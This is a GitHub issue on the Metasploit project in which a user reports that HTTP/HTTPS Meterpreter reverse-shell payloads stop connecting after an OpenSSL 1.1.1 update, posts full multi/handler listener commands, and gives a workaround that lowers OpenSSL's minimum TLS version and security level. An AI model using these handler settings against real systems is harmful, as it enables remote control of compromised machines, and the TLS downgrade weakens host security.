Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Need Http / Https Meterpreter TLS/Cert Update #10903

Open
H4xl0r opened this issue Nov 2, 2018 · 4 comments

Comments

@H4xl0r
Copy link

commented Nov 2, 2018

Http / Https Meterpreter Connection errors after openssl update.

Steps to reproduce

How'd you do it?

(running Kali up-to-date)
1.Updated to openssl OpenSSL 1.1.1 11 Sep 2018
2. Using http / https meterpreter stagers / nonstagers

Expected behavior

Executing meterpreter http / https on target.
What should happen?
Getting connection.

Current behavior

Not getting a connection, i think its a cert error.
What happens instead?
Not getting a connection

After changing settings in openssl.cnf all work again.

HINTS

Changes in openssl leading to use tls 1.2 and several improvements.
Increase default security level from 1 to 2. This moves from the 80 bit security level to the 112 bit security level and will require 2048 bit RSA and DHE keys.

The Metepreter core initializes, establishes a TLS/1.0 link over the socket and sends a GET. Metasploit receives this GET and configures the client.

Metasploit version

Kali Linux uptodate version.

OS

Kali Linux

TEMP FIX:
CHANGE openssl.cnf

MinProtocol = TLSv1.2
CipherString = DEFAULT@SECLEVEL=2
To
MinProtocol = None
CipherString = DEFAULT

@H4xl0r H4xl0r changed the title Need Http / Https Meterpreter Cert Update Need Http / Https Meterpreter TLS/Cert Update Nov 2, 2018

@sempervictus

This comment has been minimized.

Copy link
Contributor

commented Nov 3, 2018

I thought we exposed the TLS version to use on server sockets as a data store option...
Could you show us your handler config (options and advanced) please?

@H4xl0r

This comment has been minimized.

Copy link
Author

commented Nov 3, 2018

use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter_reverse_https
set LHOST 192.168.1.20
set LPORT 1111
set ExitOnSession false
set VERBOSE true
exploit -j

and

use exploit/multi/handler
set PAYLOAD windows/meterpreter_reverse_https
set LHOST 192.168.1.20
set LPORT 2222
set ExitOnSession false
set VERBOSE true
set HandlerSSLCert /root/Schreibtisch/Metasploit/Certs/domain/keycert.pem
set stagerverifysslcert true
exploit -j
(cert is a cert from letsencrypt for the domain i am using)

No Advanced options so far ....
Must be something with the tls ...
The Metepreter core initializes, establishes a TLS/1.0 link over the socket and sends a GET.
TLS 1.0 not accepted anymore with the openssl update , must be 1.2 minimum.

Temp workaround
CHANGE openssl.cnf
from
MinProtocol = TLSv1.2
CipherString = DEFAULT@SECLEVEL=2

To
MinProtocol = None
CipherString = DEFAULT

@sempervictus

This comment has been minimized.

Copy link
Contributor

commented Nov 4, 2018

Try setting SSLVersion to TLS1.2, not sure if it'll be properly exposed in the handler, if not, we'll need to make some "minor wiring adjustments."

@H4xl0r

This comment has been minimized.

Copy link
Author

commented Nov 5, 2018

i think "minor wiring adjustments." are needed :-(
openssl update changed the defaults to minimum tls1.2 eg: (openssl.conf)
MinProtocol = TLSv1.2
CipherString = DEFAULT@SECLEVEL=2
so when i run with these settings , no meterpreter connects back .
(IS using tlsv1.2 minimum)

if changing (openssl.conf)
MinProtocol = None
CipherString = DEFAULT
then i works again.
i think it is using another (lower) tls then 1.2 ....

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
3 participants
You can’t perform that action at this time.